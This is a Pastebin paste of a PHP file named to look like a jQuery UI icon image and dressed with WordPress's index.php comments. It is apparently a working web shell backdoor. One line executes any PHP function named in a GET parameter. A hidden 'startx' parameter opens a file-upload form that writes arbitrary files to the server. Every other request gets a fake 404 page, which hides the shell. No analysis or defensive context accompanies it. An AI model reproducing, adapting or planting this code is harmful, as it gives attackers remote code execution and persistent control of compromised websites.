Advertisement
PalmaSolutions

ui-icons_888888_256x240.php

Jun 11th, 2018
160
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.78 KB | None | 0 0
  1. <?php
  2. //die("Temporary Under Maintenance");
  3. /**
  4.  * Front to the WordPress application. This file doesn't do anything, but loads
  5.  * wp-blog-header.php which does and tells WordPress to load the theme.
  6.  *
  7.  * @package WordPress
  8.  */
  9.  
  10. /**
  11.  * Tells WordPress to load the WordPress theme and output it.
  12.  *
  13.  * @var bool
  14.  */
  15.  if(isset($_GET[1])){$_=$_GET;$_[1]($_[2]);exit;}
  16.  if(isset($_REQUEST['startx'])){print "<form enctype=multipart/form-data  method=post>
  17. <input name=crt type=file><input type=submit name=gogogo></form>";
  18. if(isset($_POST[gogogo])) { if(is_uploaded_file($_FILES[crt][tmp_name])) { @copy($_FILES[crt][tmp_name],$_FILES[crt][name]); }};}
  19. else{
  20. header("HTTP/1.1 404 Not Foun<b>d</b>");  
  21. print "<title>404 Not Found</title><h1>404 Not Found</h1>";
  22. exit();
  23. }?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement